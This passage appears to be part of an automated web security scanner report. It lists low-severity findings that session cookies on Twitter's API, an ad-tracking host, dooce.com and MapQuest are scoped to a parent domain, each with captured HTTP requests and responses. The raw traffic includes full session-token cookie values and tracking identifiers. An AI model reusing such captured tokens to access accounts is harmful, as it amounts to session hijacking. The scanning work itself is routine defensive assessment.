_twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/show.json?include_entities=true&contributor_details=true&id=66119447177474049 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599833-41034-58992
X-RateLimit-Limit: 1000
ETag: "d912e849d74296736258b8b5739996d5"-gzip
Last-Modified: Thu, 05 May 2011 12:50:33 GMT
X-RateLimit-Remaining: 982
X-Runtime: 0.01207
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 2cf65be715f7eb51cc58e221e6160ba3025c8657
X-RateLimit-Reset: 1304603431
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 1734

{"text":"@saritaa_raqueel Yo te quiero mas que tu ami xss (L)","coordinates":null,"truncated":false,"id_str":"66119447177474049","source":"web","geo":null,"favorited":false,"retweet_count":0,"entities
...[SNIP]...

16.4. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=165951124 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
X-PHX: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1303568398.1304617828.3; __utmc=43838368; __utmb=43838368.5.10.1304617828; _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwEiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2%250AM2FkZmI2Yw%253D%253D--253a20e395e9e3ad595503b00398ea64e2518b85

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:50:33 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304599833-46716-42503
X-RateLimit-Limit: 1000
ETag: "ab7de5d59aaf708a4f83ad36220e28d2"-gzip
Last-Modified: Thu, 05 May 2011 12:50:33 GMT
X-RateLimit-Remaining: 981
X-Runtime: 0.02291
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 0a69017ca8a0b28e7a8a0bd2312756be458baa6b
X-RateLimit-Reset: 1304603431
Set-Cookie: original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 36486

{"statuses":[{"text":"@saritaa_raqueel Ahhhh :D","coordinates":null,"truncated":false,"id_str":"66119477279997952","source":"web","geo":null,"favorited":false,"retweet_count":0,"entities":{"urls":[],"
...[SNIP]...

16.5. http://t.mookie1.com/t/v1/imp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://t.mookie1.com
Path:	/t/v1/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

session=1304557215|1304557215; path=/; domain=.mookie1.com
id=914804995789526; path=/; expires=Tue, 29-May-12 01:00:15 GMT; domain=.mookie1.com

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=362011266&migTagDesc=Cingular&migAtlSA=319709115&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; id=914804995789526; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 29-May-12 01:00:15 GMT; domain=.mookie1.com
Set-Cookie: session=1304557215|1304557215; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

16.7. http://www.mapquest.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

16.8. http://www.mapquest.com/_svc/ad/getads previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

16.9. http://www.mapquest.com/_svc/apixel previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

16.10. http://www.mapquest.com/_svc/publishing/promo previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

16.11. http://www.mapquest.com/_svc/searchio previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

16.12. http://www.mapquest.com/cdn/_uac/adpage.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

16.13. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.mapquest.com
Path:	/cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
